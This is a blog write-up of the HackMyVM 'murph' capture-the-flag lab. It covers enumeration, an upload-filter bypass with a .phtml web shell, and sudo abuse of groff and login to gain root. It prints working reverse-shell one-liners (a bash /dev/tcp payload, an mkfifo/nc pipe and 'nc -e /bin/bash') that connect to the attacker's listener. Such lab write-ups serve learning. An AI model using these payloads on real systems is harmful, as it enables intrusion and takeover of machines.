The free CTF Challenge web site “hackmyvm.eu” have another medium level vm called ‘murph‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed the hackmyvm murph CTF challenge.
This well put together room by the site master “sML” and has some obscure commands to confuse and bemuse. I was off to a bad start but soon I was set on the righteous path thanks the friendly Discord group over on hackmyvm.eu.
Table off contents
The murph vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.10/24 – This is the Murph vm.
For enumeration of the hackmyvm murph Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.
Using “nmap” shows that there are a few ports open. SSH and HTTP:
nmap -F 192.168.186.10
When I see port 80 open, I will always do a gobuster enumeration to fuzz out any web directories that may be important.
gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.186.10
This quickly shows that there is an dir called “/uploads” on the server. So lets fire up Firefox and open it up.
Looking at the source code I can see something interesting.
So anytime the word “php” is used it will be swapped out to “wtf”. This can be gotten around by realizing (which I didn’t) that php is not case sensitive and that there are alternative to .php extensions.
- Filename: shell.phtml
- Content: <?PHP exec(“/bin/bash -c ‘bash -i >&/dev/tcp/192.168.186.150/1234 0>&1′”);?>
Be sure to change the ip to suit your own. Then start up a “nc” listener on your enumeration machine. Also be aware that sometimes browsers change the quotes a bit so if you are copying and pasting the above command make sure the quotes are correct.
nc -vlnp 1234
So back to the web browser, after you click the “Submit Query” button you can just go to the link, http://192.168.186.10/uploads/shell.phtml
And in your “nc” window you should spawn a shell. It’s important to that you stablize it as some of the following commands won’t work. To stabilize run the following commands. \
python3 -c "import pty;pty.spawn('/bin/bash')"\
stty raw -echo;fg
If you want to learn more about stabilizing a reverse shell take a look at my post on it.
So now its time for some more enumeration, eventually you will find the file “/opt/murph” which is a suid binary and is interesting.
It’s waiting for a signal called “SIGUSR1”. Digging into the signal man page I found the following entry.
So you have to send the process the signal “SIGUSR1” . You can send signals to processes via the kill command. As already mentioned this has to be done from a stabilized shell, otherwise it won’t work.
kill -10 <pid of the murph process>
You should now be the user “jen” and can read the user flag.
What the Groff
The user “jen” has some sudo privileges.
The solution for this is also in the man page for groff!
So why are these unsafe? Well groff is a tool for creating man pages and it allows you to do it inside an interactive(ish) shell.
|What is it?
|Read the standard output from the specified command
|Open the specified file for writing
opena request is like
open, but if the file exists, append to it instead of truncating it.
|Execute the shell command(s) specified by cmds.
|Pipe the output of
gtroff to the shell command(s) specified by pipe
So fire up groff in unsafe node and use it to connect via revshell to another “nc” listener.
On your enumeration system run a “nc” listener on a different port than the previous one.
nc -vlnp 1235
And on the host run “groff” in “unsafe” mode.
sudo -u pat groff -U
This will launch a kind of shell for groff.
While in the shell you can type commands. So input this one.
.pso rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 1235 >/tmp/f
seems the above command is causing some issues and an alternate command below also works.
.pso nc -e /bin/bash 192.168.186.150 1235
Now you should be the user “pat”. It’s worth also stabilizing this shell, see the webshell section for details on how to do it.
You can find some useful groff info here.
And Root Login
As the user “pat” you have access to the login command as root via “sudo”.
This was is just a matter of running the below command.
sudo login -f root
Now you have root access and you can get the root key and submit it to the site over on hackmyvm.eu.
I hoped you enjoyed this room as much as I did. I find that I got stuck on something really simple and needed help to get past it, so don’t worry about reading write ups. We all have to do it to progress. While the more complicated stuff seemed to come easier for this room. Usually, for me, its the other way around.
Any comments suggestions please leave them below.